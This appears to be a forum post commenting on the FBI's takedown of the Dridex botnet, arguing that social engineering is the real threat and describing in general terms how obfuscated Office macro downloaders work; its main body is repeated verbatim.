I was reading this news today: FBI takes down Dridex botnet, seizes servers, arrests suspect
Well, this is good news but ...
I still think that when we talk about advanced attacks, the attackers are not piece of code but humans with a strategy and objective: the user.
Dridex is a tool like many others, named for example, Banload, Dyre, etc.
What really is important is social engineering techniques used by criminals, because probably the attackers still will use it to study a new attack strategy.
I often find on https://malwr.com new malware and I see increasing hidden and obfuscated downloader macro in Office documents. These documents contain malicious operations sequences encoded in VBScript, Visual Basic for Applications or VBE (Visual Basic Encoded).
When the document opens the code, It starts to do things like contact a server transfer, additional malware on more or less encrypted channels and "call home" to the attacker to find out what new instructions to further compromise.
So, the true defense must start from a mind-set of the user: we must always know the sender or the source of the received mail. If in doubt, delete it.
Anti-spam and Antivirus are often ineffective against advanced threats and, unfortunately, the weak link in the chain is always the user.
Well, this is good news but ...
I still think that when we talk about advanced attacks, the attackers are not piece of code but humans with a strategy and objective: the user.
Dridex is a tool like many others, named for example, Banload, Dyre, etc.
What really is important is social engineering techniques used by criminals, because probably the attackers still will use it to study a new attack strategy.
I often find on https://malwr.com new malware and I see increasing hidden and obfuscated downloader macro in Office documents. These documents contain malicious operations sequences encoded in VBScript, Visual Basic for Applications or VBE (Visual Basic Encoded).
When the document opens the code, It starts to do things like contact a server transfer, additional malware on more or less encrypted channels and "call home" to the attacker to find out what new instructions to further compromise.
So, the true defense must start from a mind-set of the user: we must always know the sender or the source of the received mail. If in doubt, delete it.
Anti-spam and Antivirus are often ineffective against advanced threats and, unfortunately, the weak link in the chain is always the user.
Last edited by a moderator:
